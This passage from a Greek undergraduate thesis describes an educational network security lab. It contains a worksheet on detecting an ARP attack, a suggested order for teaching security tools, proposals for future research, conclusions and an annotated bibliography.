Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Κατά την πλοήγησή σας στο διαδίκτυο τι παρατηρείτε; Τι μπορεί να συμβαίνει;

2. Ποιο είδος πακέτων θα πρέπει να παρακολουθήσετε; Εφαρμόστε το κατάλληλο φίλτρο και γράψτε τη

παρατηρείτε.

3. Αφού διαγράψετε τα περιεχόμενα του ARP Table του μηχανήματος-θύμα, τι παρατηρείτε όταν

προσπαθείτε να κάνετε Ping σε μια εξωτερική διεύθυνση;

4. Ποια είναι η MAC διεύθυνση του μηχανήματος που πραγματοποιεί την επίθεση;

5. Πώς μπορεί να αντιμετωπιστεί άμεσα η επίθεση;

Page 295: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

295 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Κεφάλαιο 7 Σύνοψη και Μελλοντική Έρευνα

7.1 Σύνοψη Εργαστηρίου Ασφάλειας. Πλεονεκτήματα - Μειονεκτήματα

Στην παρούσα εργασία προτείνεται ένα εργαστήριο ασφάλειας για εκπαιδευτικούς σκοπούς

και χρήση σε ακαδημαϊκό περιβάλλον. Το εργαστήριο εξετάζει σε βάθος θέματα ασφάλειας

πληροφοριακών συστημάτων επικεντρώνοντας στο γνωστικό πεδίο των δικτύων

υπολογιστών, χωρίς να επεκτείνεται στα υπόλοιπα γνωστικά πεδία της ασφάλειας. Η

ανάπτυξή του βασίστηκε τόσο σε υπάρχουσες ερευνητικές μελέτες όσο και στη μελέτη

επιλεγμένων εργαλείων, ενώ αξιοποιήθηκε και η τεχνολογία των εικονικών μηχανών.

Κατά τον σχεδιασμό και την ανάπτυξη του εργαστηρίου έγινε προσπάθεια ώστε να:

• αξιοποιηθούν διάφορες εκπαιδευτικές τεχνικές

• σχεδιαστούν πρωτότυπες ασκήσεις

• διευκολυνθούν οι σπουδαστές στην παρακολούθησή του

• διευκολυνθεί ο εισηγητής στην εφαρμογή του

• είναι επεκτάσιμο

• είναι τροποποιήσιμο

• μην είναι επιβλαβές και καταστρεπτικό για τις υλικοτεχνικές υποδομές του

εκπαιδευτικού φορέα

• είναι ρεαλιστικό ως προς τις υπάρχουσες υλικοτεχνικές υποδομές των ακαδημαϊκών

εργαστηρίων

Οι υπάρχουσες ερευνητικές μελέτες και τα κριτήρια ανάπτυξης που αναφέρθηκαν παραπάνω

δεν επαρκούν για την αξιολόγηση του εργαστηρίου. Ο σχεδιασμός της αξιολόγησης του

εργαστηρίου μπορεί να αποτελέσει αντικείμενο περαιτέρω έρευνας με τη συμμετοχή των

Page 296: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

296 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

σπουδαστών. Ωστόσο, είναι δυνατό να εντοπιστούν κάποια πλεονεκτήματα και

μειονεκτήματα στην ανάπτυξη του συγκεκριμένου εργαστηρίου.

Στα πλεονεκτήματα μπορούν να αναφερθούν τα εξής:

• εξασφαλίζεται η προστασία των υλικοτεχνικών υποδομών του ακαδημαϊκού εργαστηρίου

αφού η διεξαγωγή των εργαστηριακών ασκήσεων δύναται να πραγματοποιηθεί σε

εικονικό δίκτυο, εντελώς απομονωμένο από το φυσικό, ενώ ταυτόχρονα είναι εύκολη η

ανάκαμψη από καταστροφή

• εξασφαλίζεται η πρόσβαση στο διαδίκτυο για την ενημέρωση των εργαλείων και την

αναζήτηση βιβλιογραφικών πηγών μέσω το φυσικού δικτύου του εργαστηρίου

• δεν έχει απαιτήσεις σε υλικοτεχνική υποδομή πέραν της συνηθισμένης ενός ακαδημαϊκού

εργαστηρίου

• διευκολύνεται η παρακολούθηση του εργαστηρίου από τους σπουδαστές αφού γίνεται

χρήση, σε μεγάλη έκταση, εφαρμογών Windows με τις οποίες είναι εξοικειωμένοι

• επιτρέπει την τροποποίηση και προσαρμογή των ασκήσεων στις ανάγκες και το επίπεδο

των σπουδαστών

• η χρήση της τεχνολογίας των εικονικών μηχανών επιτρέπει την περαιτέρω εξάσκηση των

σπουδαστών στον προσωπικό τους υπολογιστή

• αξιοποιεί διάφορες εκπαιδευτικές τεχνικές όπως τη συνεργατική μάθηση, τη συζήτηση,

τη μέθοδο ερωτήσεων-απαντήσεων, τη μελέτη περίπτωσης και την πρακτική εξάσκηση

• οι ασκήσεις στη μελέτη κάθε εργαλείου έχουν αυξανόμενο βαθμό δυσκολίας και στις

περισσότερες περιπτώσεις εξαντλούν τις δυνατότητές τους

• τα εργαλεία που χρησιμοποιούνται είναι ισάξια πολλών αντίστοιχων εμπορικών και

συχνά χρησιμοποιούνται από επαγγελματίες στο χώρο της ασφάλειας

• είναι προσανατολισμένο στις απαιτήσεις της αγοράς εργασίας, παρέχοντας βασικές

γνώσεις σε προβλήματα ασφάλειας του πραγματικού κόσμου

Στα μειονεκτήματα αυτής της προσέγγισης για την ανάπτυξη του εργαστηρίου μπορούν να

αναφερθούν τα εξής:

• δεν καλύπτει όλο το εύρος του γνωστικού πεδίου της ασφάλειας

• δεν χρησιμοποιεί πολλά διαφορετικά λειτουργικά συστήματα

• η χρήση των εικονικών μηχανημάτων για την προσομοίωση της λειτουργίας δικτυακών

πρωτοκόλλων, ενδέχεται να επηρεάσει τα αποτελέσματα κάποιων εργαλείων ελέγχoυ

τρωτότητας, ιδιαίτερα αυτών που αναλύουν πακέτα δεδομένων (π.χ. nmap)

Page 297: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

297 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

7.2 Πρόταση εφαρμογής του εργαστηρίου

Για τη διεξαγωγή του εργαστηριακού μαθήματος πρέπει οι σπουδαστές να έχουν μελετήσει,

εκ των προτέρων, τα χαρακτηριστικά και τις δυνατότητες του εργαλείου που πρόκειται να

διδαχτεί. Αυτό μπορεί να γίνει μέσω της ιστοσελίδας του μαθήματος, όπου ο εισηγητής

πρέπει να έχει φροντίσει να αναρτήσει το απαραίτητο διδακτικό υλικό. Πριν τη διεξαγωγή

του εργαστηρίου, ο εισηγητής πρέπει επίσης να έχει μεριμνήσει ώστε τα εργαλεία που θα

χρησιμοποιηθούν να λειτουργούν σωστά, να διαθέτουν τις τελευταίες ενημερώσεις τους ή να

έχει πραγματοποιηθεί οποιαδήποτε άλλη ενέργεια κρίνεται απαραίτητη (ρυθμίσεις

αναχώματος ασφάλειας, δικτυακού εξοπλισμού, κλπ) για την ομαλή λειτουργία του

εργαστηρίου.

Όσον αφορά τον προγραμματισμό διδασκαλίας των εργαλείων προτείνονται τα εξής:

• κάθε εργαλείο να μελετάται σε σύνολο ξεκινώντας από την άσκηση με βαθμό δυσκολίας

1 για να εξοικειωθούν οι σπουδαστές με τη χρήση του και εν συνεχεία να μελετώνται οι

προηγμένες λειτουργίες του

• τα εργαλεία που αφορούν το ίδιο γνωστικό αντικείμενο να μελετούνται διαδοχικά π.χ εάν

μελετάται ο εντοπισμός ευπαθειών μπορεί να πραγματοποιηθούν πρώτα οι ασκήσεις για

το εργαλείο Microsoft Baseline Security Analyzer και στη συνέχεια οι ασκήσεις για το

εργαλείο Nessus

• όταν ασκήσεις συνδυάζουν δύο εργαλεία προαπαιτείται να έχει μελετηθεί πρώτα το ένα

από αυτά. Συγκεκριμένα:

o για τη μελέτη του εργαλείου Metasploit απαιτείται η γνώση των εργαλείων Nessus και

Fast-Track

o για τη μελέτη των εργαλείων Nessus και Snort απαιτείται η γνώση του εργαλείου

Nmap

o για τη μελέτη του εργαλείου Wireshark απαιτείται η γνώση του εργαλείου Cain &

Abel

Με βάση τα παραπάνω προτείνεται η διδασκαλία των εργαλείων με την εξής σειρά:

1. Nmap: εργαλείο το οποίο μπορεί να συνδυαστεί στις ασκήσεις με άλλα εργαλεία και να

αυξήσει την αποδοτικότητα του εργαστηριακού μαθήματος

2. MBSA: είναι εύκολο στη χρήση του και κατάλληλο για την εισαγωγή των σπουδαστών

στον εντοπισμό ευπαθειών

3. Nessus: διευρύνει τις γνώσεις των σπουδαστών σε περισσότερο προχωρημένα θέματα

εντοπισμού ευπαθειών και μπορεί να συνδυαστεί με επόμενες ασκήσεις του εργαστηρίου

Page 298: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

298 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4. Paros Proxy: εξειδικεύει τις γνώσεις των φοιτητών στον εντοπισμό ευπαθειών σε

εφαρμογές ιστού

5. Cain & Abel: αξιόλογο και κατάλληλο εργαλείο για την εισαγωγή των σπουδαστών στις

επιθετικές τεχνικές

6. Fast-Track: αυτοματοποιημένο εργαλείο κατάλληλο για την εισαγωγή των σπουδαστών

σε θέματα εκμετάλλευσης ευπαθειών

7. Metasploit: εξαιρετικό εργαλείο με πολλές δυνατότητες για τη μελέτη προχωρημένων

θεμάτων εκμετάλλευσης ευπαθειών

8. Wireshark: εργαλείο κατάλληλο για την εισαγωγή των σπουδαστών σε αμυντικά θέματα

ασφάλειας

9. Snort: εργαλείο για τη μελέτη προχωρημένων αμυντικών τεχνικών

10. MSAT: αυτοματοποιημένο και εύκολο στη χρήση εργαλείο για την εισαγωγή των

σπουδαστών στην ανάλυση επικινδυνότητας

Η παραπάνω πρόταση λειτουργίας του εργαστηρίου δεν είναι η μοναδική. Μπορούν να

επιλεγούν και άλλοι συνδυασμοί, αρκεί να τηρούνται οι προϋποθέσεις που αναφέρθηκαν

αρχικά.

7.3 Προτάσεις Μελλοντικής Έρευνας

Στην παρούσα εργασία αναπτύχθηκε ένα εργαστήριο ασφάλειας δικτυοκεντρικών

συστημάτων χωρίς όμως να εξαντληθεί όλο το εύρος του γνωστικού πεδίου. Αντίθετα,

παρέχει το έναυσμα για περαιτέρω μελλοντική έρευνα. Θέματα τα οποία θα μπορούσαν να

αποτελέσουν αντικείμενο έρευνας είναι τα εξής:

• η πρακτική εφαρμογή του εργαστηρίου και η αξιολόγησή του τόσο από τους σπουδαστές,

όσο και από τους εισηγητές ως προς την λειτουργικότητα του, την αποδοτικότητα του, το

περιεχόμενό του και τα οφέλη που προκύπτουν από την εφαρμογή του

• η προσαρμογή και επέκταση του εργαστηρίου με βάση την εμπειρία που συγκεντρώθηκε

με την πρακτική εφαρμογή του εργαστηρίου

• η προσαρμογή και η επέκτασή του στην εξ’ αποστάσεως εκπαίδευση και η διερεύνηση

των εκπαιδευτικών του αποτελεσμάτων σε αυτό το είδος εκπαίδευσης

• η μελέτη επιπλέον εργαλείων για τον έλεγχο της ασφάλειας δικτυοκεντρικών

συστημάτων και η ανάπτυξη εργαστηριακών ασκήσεων για αυτά

• η επέκταση των ασκήσεων με άλλα λειτουργικά συστήματα

Page 299: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

299 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• ο έλεγχος τρωτότητας άλλων γνωστικών πεδίων της ασφάλειας πληροφοριακών

συστημάτων όπως π.χ. βάσεων δεδομένων, ασύρματων δικτύων κλπ

7.4 Συμπεράσματα

Το γνωστικό πεδίο της ασφάλειας δικτυοκεντρικών συστημάτων είναι ένας τομέας της

Ασφάλειας Πληροφοριακών συστημάτων με ιδιαίτερο ερευνητικό ενδιαφέρον. Η ραγδαία

ανάπτυξη της δικτυακής τεχνολογίας, κυρίως την τελευταία δεκαετία, άνοιξε νέους ορίζοντες

στην επικοινωνία, την εργασία, την εκπαίδευση, την ιατρική, την επιχειρηματικότητα και

γενικότερα σε κάθε τομέα της ανθρώπινης δραστηριότητας. Πλέον τα περισσότερα

πληροφοριακά συστήματα είναι μέρος ενός δικτύου.

Η δικτύωση, όμως, αυτή των πληροφοριακών συστημάτων δημιούργησε και την ανάγκη

προστασίας τους από κακόβουλες ενέργειες. Στην αγορά εργασίας το εξειδικευμένο

προσωπικό σε θέματα ασφάλειας δικτύων και προστασίας κρίσιμων υποδομών έχει μεγάλη

απορρόφηση. Είναι προφανές, λοιπόν, ότι τα ακαδημαϊκά ιδρύματα θα πρέπει να

προσαρμόσουν τα εκπαιδευτικά τους προγράμματα, ώστε να παρέχουν εκπαίδευση και

κατάρτιση των σπουδαστών πληροφορικής σε θέματα ασφάλειας.

Οι έρευνες έχουν δείξει ότι η μεγιστοποίηση της αποτελεσματικότητας ενός εκπαιδευτικού

ακαδημαϊκού προγράμματος ασφάλειας, δεν μπορεί να επιτευχθεί μόνο με τη θεωρητική

μελέτη. Απαιτείται και η πρακτική εξάσκηση των σπουδαστών. Επομένως η παροχή ενός

εργαστηριακού μαθήματος κρίνεται απαραίτητη. Όπως αναφέρει και ο Κομφούκιος «Ακούω

και ξεχνώ, βλέπω και θυμάμαι, κάνω και καταλαβαίνω».

Το γνωστικό πεδίο της ασφάλειας πληροφοριακών συστημάτων παρέχει τη δυνατότητα για

την ανάπτυξη πολλών διαφορετικών εργαστηριακών προγραμμάτων. Για τη δημιουργία ενός

τέτοιου προγράμματος θα πρέπει αρχικά, να επιλεγεί το επιμέρους γνωστικό πεδίο της

ασφάλειας πληροφοριακών συστημάτων που θα μελετηθεί, να καθοριστεί η εκπαιδευτική

μέθοδος και οι εκπαιδευτικοί στόχοι, να επιλεγούν τα κατάλληλα για την επίτευξη των

στόχων εργαλεία και να αναπτυχθούν οι ασκήσεις οι οποίες θα μεγιστοποιήσουν την

λειτουργικότητα και την απόδοση του μαθήματος.

Η πραγματική αξιολόγηση ενός ακαδημαϊκού εργαστηρίου ασφάλειας είναι αποτέλεσμα των

συμπερασμάτων που θα εξαχθούν από την πρακτική του εφαρμογή.

Page 300: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

300 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Επίλογος

Τα προβλήματα ασφάλειας που υπάρχουν σε όλα τα πληροφοριακά συστήματα έχουν ως

αποτέλεσμα αφενός την δαπάνη μεγάλων χρηματικών ποσών σε εργασίες πρόληψης,

επιδιόρθωσης προβλημάτων, ανακατασκευή κατεστραμμένων δεδομένων και λοιπών

ενεργειών και αφετέρου την απώλεια εμπορικών ευκαιριών και παραγωγικών επενδύσεων.

Οι επιπλέον δυνατότητες και ευκολίες, τις οποίες προσπαθούν να παρέχουν οι

κατασκευαστές των Πληροφοριακών Συστημάτων στα προϊόντα τους, με σκοπό την

κατάκτηση της αγοράς, είναι ο εχθρός της ασφάλειας. Οι περισσότερες ευκολίες οδηγούν σε

μεγαλύτερη πολυπλοκότητα, περισσότερο κώδικα, περισσότερα σφάλματα, και περισσότερα

προβλήματα ασφάλειας.

Οι κακόβουλοι χρήστες των πληροφοριακών συστημάτων εντοπίζουν τα προβλήματα και δεν

διστάζουν να τα εκμεταλλευτούν προς όφελος τους. Οι τεχνικές εκμετάλλευσης που

αναπτύσσουν και ο χρόνος που επενδύουν στη δημιουργία νέων διογκώνουν το πρόβλημα

της ασφάλειας, ενώ συχνά βρίσκονται ένα βήμα μπροστά από τους υπεύθυνους ασφάλειας

στον εντοπισμό ευπαθειών.

Για την αποτελεσματικότερη αντιμετώπιση αυτού του προβλήματος κρίνεται απαραίτητη η

ανάπτυξη μιας κουλτούρας ασφάλειας. Το ρόλο αυτό καλούνται να τον αναλάβουν τα

ακαδημαϊκά ιδρύματα, τα οποία είναι το εκκολαπτήριο των αυριανών επαγγελματιών

πληροφορικής. Με την προσαρμογή των εκπαιδευτικών τους προγραμμάτων σε θέματα

ασφάλειας και την διεύρυνσή τους σε πρακτικές εφαρμογές, ίσως στο μέλλον να μπορέσουμε

να μετράμε λιγότερες απώλειες που να οφείλονται σε προβλήματα ασφάλειας

πληροφοριακών συστημάτων.

Page 301: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

301 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Βιβλιογραφία

• Κάτσικας Σ., Ασφάλεια Υπολογιστών, Ελληνικό Ανοιχτό Πανεπιστήμιο, Πάτρα 2001. [Βασικές έννοιες ασφάλειας πληροφοριακών συστημάτων, αναγκαιότητα προστασίας πληροφοριών, σχέδιο ασφάλειας, διαχείριση κινδύνων και μεθοδολογίες διαχείρισης κινδύνων, πολιτική ασφάλειας, έλεγχος προσπέλασης, πολιτικές και μοντέλα ελέγχου προσπέλασης, ασφάλεια λειτουργικών συστημάτων, κακόβουλο λογισμικό].

• Κάτσικας Σ., Ασφάλεια Δικτύων, Ελληνικό Ανοιχτό Πανεπιστήμιο, Πάτρα 2001. [Βασικές έννοιες δικτύων, σημασία των δικτύων και ανάγκη προστασίας τους, πρωτόκολλα δικτύων, πρωτόκολλα ασφάλειας στο μοντέλο OSI, ασφάλεια στο επίπεδο internet, ασφάλεια στο επίπεδο εφαρμογών, γενικευμένα συστήματα ασφάλειας εφαρμογών, Kerberos, δικτυακά αναχώματα (firewalls), συστήματα αναγνώρισης εισβολών].

• Ζορκάδης Β. Κρυπτογραφία, Ελληνικό Ανοιχτό Πανεπιστήμιο, Πάτρα 2002. [Βασικές έννοιες κρυπτογραφίας, αναγκαιότητα κρυπτογραφίας, συμμετρικά συστήματα κρυπτογραφίας, ασύμμετρα συστήματα κρυπτογραφίας, ψηφιακές υπογραφές, κρυπτογραφικοί αλγόριθμοι (DES, IDEA, AES, RSA)].

• Κάτσικας Σ. – Γκρίτζαλης Δ – Γκρίτζαλης Σ., Ασφάλεια Πληροφοριακών Συστημάτων, Εκδόσεις Νέων Τεχνολογιών, Αθήνα 2004. [Εννοιολογική θεμελίωση ασφάλειας πληροφοριακών συστημάτων και υποδομών, τεχνολογίες διαχείρισης ταυτότητας, ασφάλεια συστημάτων βάσεων δεδομένων, διασφάλιση και αξιολόγηση ασφάλειας συστημάτων και προϊόντων, ανάλυση - αποτίμηση και διαχείριση επικινδυνότητας, ελεγκτική πληροφοριακών συστημάτων και προστασία προσωπικών δεδομένων].

• Γκρίτζαλη Δ., Αυτονομία και Πολιτική Ανυπακοή στον Κυβερνοχώρο, Παπασωτηρίου, Αθήνα 2004. [Μορφότυπος των ΤΠΕ, έλλειψη τεχνογνωσίας και συνεργασίας, προστασία κρίσιμων υποδομών, ασφαλή πληροφοριακά συστήματα, παγκοσμιοποιημένη οικονομία, παγκοσμιοποίηση και ασφάλεια, οι αντινομιστές του κυβερνοχώρου].

• Γ. Πάγκαλος – Ι. Μαυρίδης, Ασφάλεια Πληροφοριακών Συστημάτων και Δικτύων, Εκδόσεις ΑΝΙΚΟΥΛΑ, Θεσσαλονίκη 2002. [Προστασία πληροφοριακών συστημάτων, Ανάλυση κινδύνων, Αξιοποίηση της ασφάλειας υπολογιστικών συστημάτων, ασφάλεια των πληροφοριών στο διαδίκτυο, προστασία ψηφιακών επικοινωνιών, ασφαλείς συναλλαγές στο διαδίκτυο]

• Γκρίτζαλης Δ., Ανάλυση και Διαχείριση Επικινδυνότητας ΠΣ, Πανεπιστημιακές Διαλέξεις, 2004 [Βασικές έννοιες στην Ανάλυση και Διαχείριση Επικυνδυνότητας Πληροφοριακών Συστημάτων. Διασύνδεση των εννοιών Ευπάθειες, Απειλές, Κίνδυνοι, Ζημιές, Επιπτώσεις.]

• ΕΑΠ, Θεματική Ενότητα ΠΛΗ 35: Προστασία και Ασφάλεια Συστημάτων Υπολογιστών, 2η

Γραπτή Εργασία , Ακαδημαϊκό έτος 2008-2009 [Προστασία πληροφοριακών συστημάτων, Ανάλυση κινδύνων, Αξιοποίηση της ασφάλειας υπολογιστικών συστημάτων, ασφάλεια των πληροφοριών στο διαδίκτυο, προστασία ψηφιακών επικοινωνιών, ασφαλείς συναλλαγές στο διαδίκτυο]

Page 302: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

302 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Raymond E. S., «Πώς να γίνεις Hacker», http://earthlab.uoi.gr/indy/hacker-howto-gr/ [Χαρακτηριστικά, ιδεολογία, κουλτούρα και φιλοσοφία των Hackers ]

• Stallings W., Βασικές Αρχές Ασφάλειας Δικτύων: Εφαρμογές και πρότυπα, 3η Αμερικάνικη Έκδοση, Κλειδάριθμος, Αθήνα 2008. [Βασικές αρχές κρυπτογραφίας, εισβολείς, τεχνικές εισβολής, ανίχνευση εισβολών, διαχείριση συνθηματικών, κακόβουλο λογισμικό, μέτρα αντιμετώπισης ιών, κριτήρια αξιολόγησης ασφάλειας στην τεχνολογία της πληροφορικής].

• Scambray J.- McClure S. – Kurtz G., Hacking Exposed: Network Security Secrets & Solutions,

Sixth Edition, McGraw-Hill, 2009. [Μεθοδολογία, τεχνικές και εργαλεία που χρησιμοποιούν οι Hackers για να εντοπίσουν κενά ασφάλειας στα δομικά στοιχεία ενός πληροφοριακού συστήματος και να αποκτήσουν πρόσβαση σε αυτό].

• Strebe M., Network Security Foundations, Sybex, San Francisco, 2004 [Hacking: τι είναι, ποιοι οι τύποι των Hackers, που επιτίθενται, ποιες τεχνικές χρησιμοποιούν, συστήματα κρυπτογράφησης και αυθεντικοποίησης, σχεδιασμός, υλοποίηση και συντήρηση πολιτικής ασφάλειας].

• Tanenbaum A., Δίκτυα Υπολογιστών 4η Αμερικάνικη Έκδοση, Κλειδάριθμος, Αθήνα 2003.

[Βασικές έννοιες δικτύων σε θέματα που αφορούν το φυσικό επίπεδο, το επίπεδο συνδέσμου μετάδοσης δεδομένων, το επίπεδο δικτύου, το επίπεδο μεταφοράς, το επίπεδο εφαρμογών και την ασφάλεια δικτύου].

• Denning D., Activism, Hacktivism and Cyber-terrorism: The Internet as a tool for influencing Foreign Policy, Georgetown University, USA 1999. [Το internet συνυφασμένο με την ΚτΠ. Διαδικτυακές μάχες για την κατοχή και τη διάδοση της πληροφορίας. Ακτιβισμός, χακτιβισμός και κυβερνοτρομοκρατία: οι μεταξύ τους διαφοροποιήσεις και τα ρευστά όρια. Προθέσεις, ενέργειες, απειλές αυτών των ομάδων. Από τον ήπιο ιντερνετικό διάλογο στην εξτρεμιστική πλευρά η οποία εμπεριέχει σενάρια καταστροφής σε παγκόσμιο επίπεδο].

• Hannemyr G., “Technology and pleasure: Considering Hacking constructive”, in FirstMonday Journal, Vol. 4, No. 2, 1999. [Μορφότυπος, χαρακτηριστικά και κύματα Hacking, μεταλλαγή του ορισμού και της εικόνας των Hackers ιδιαίτερα κατά το δεύτερο μισό της δεκαετίας του 80. Μετεξέλιξη των παραπάνω έως τις μέρες μας. Διαμόρφωση της ηθικής και στοιχεία του ιδεολογικού υπόβαθρου των Hackers].

• Levy S., Hackers: Heroes of the Computer Revolution, Anchor Press, 1984. [Η συμβολή των Hackers των δεκαετιών ’60 και ’70 στη διαμόρφωση ενός ηθικού κώδικα που έχει ως κεντρικό του άξονα την ελεύθερη πρόσβαση στην πληροφορία].

• Raymond E., “The cathedral and the bazaar”, in First Monday Journal, Vol. 3, No. 3, 1998. [Συγκρίνοντας την ανάπτυξη λογισμικού με την κατασκευή ενός καθεδρικού ναού και τη λειτουργία ενός ανοιχτού παζαριού, αναδεικνύεται η συμβολή των Hackers στην δημιουργία επιτυχημένου λογισμικού (Linux, fetchmail), η οποία αξιοποιεί μεταξύ άλλων στην άποψη του Ρώσου αναρχικού του 19ου αι. Πιοτρ Αλεξέιεβιτς Κροπότκιν «ο στόχος μπορεί να επιτευχθεί μόνο με την σκληρή προσπάθεια πολλών συγκλινουσών θελήσεων].

• Vegh S., “Hacktivists or Cyberterrorists? The changing media discourse on hacking”, in First Monday Journal, Vol. 7, No. 10, 2002. [Η 11/9/2001 ως σημείο αναφοράς για την απόδοση μιας έντονα αρνητικής χροιάς στα διάφορα αντιεξουσιαστικά κινήματα των Hackers. Ενδυνάμωση των νομοθετικών αλλαγών εξαιτίας του

Page 303: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

303 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

φόβου έναντι στη δυναμική ενός παγκόσμιου ψηφιακού κόσμου. Περιθωριοποίηση των ενεργειών των Hackers και προσπάθεια εξίσωσης τους με τους κυβερνοτρομοκράτες τόσο από την εκάστοτε κρατική μηχανή όσο και από τα μέσα μαζικής ενημέρωσης].

• Baier D., Improving Application Security through Penetration Testing, ERNW, Germany, 2005. [Γιατί είναι απαραίτητοι οι έλεγχοι τρωτότητας και σε τι διαφέρουν από τους απλούς ελέγχους τους οποίους εκτελεί ο διαχειριστής ενός ΠΣ. Τι είδους έλεγχοι τρωτότητας μπορούν να διενεργηθούν και ποιες οι πληροφορίες οι οποίες μπορούν να συλλεχτούν. Ποιοι διενεργούν ελέγχους τρωτότητας].

• Lowery J., Danhieux P., Clarie W., Penetration Testing - The Third Party Hacker, SANS Institute, 2006 [Τι είναι έλεγχος τρωτότητας και ποιοι αντικειμενικοί σκοποί του. Γιατί οι εταιρείες επιλέγουν να τον αναθέτουν σε εξωτερικούς του οργανισμού τους συνεργάτες. Ποιοι οι κίνδυνοι από αυτή την επιλογή. Ποια είναι τα σημεία τα οποία συνίσταται να εξακριβωθούν κατά την αξιολόγηση ενός υποψήφιου εξωτερικού συνεργάτη ο οποίος θα εκτελέσει ελέγχους τρωτότητας].

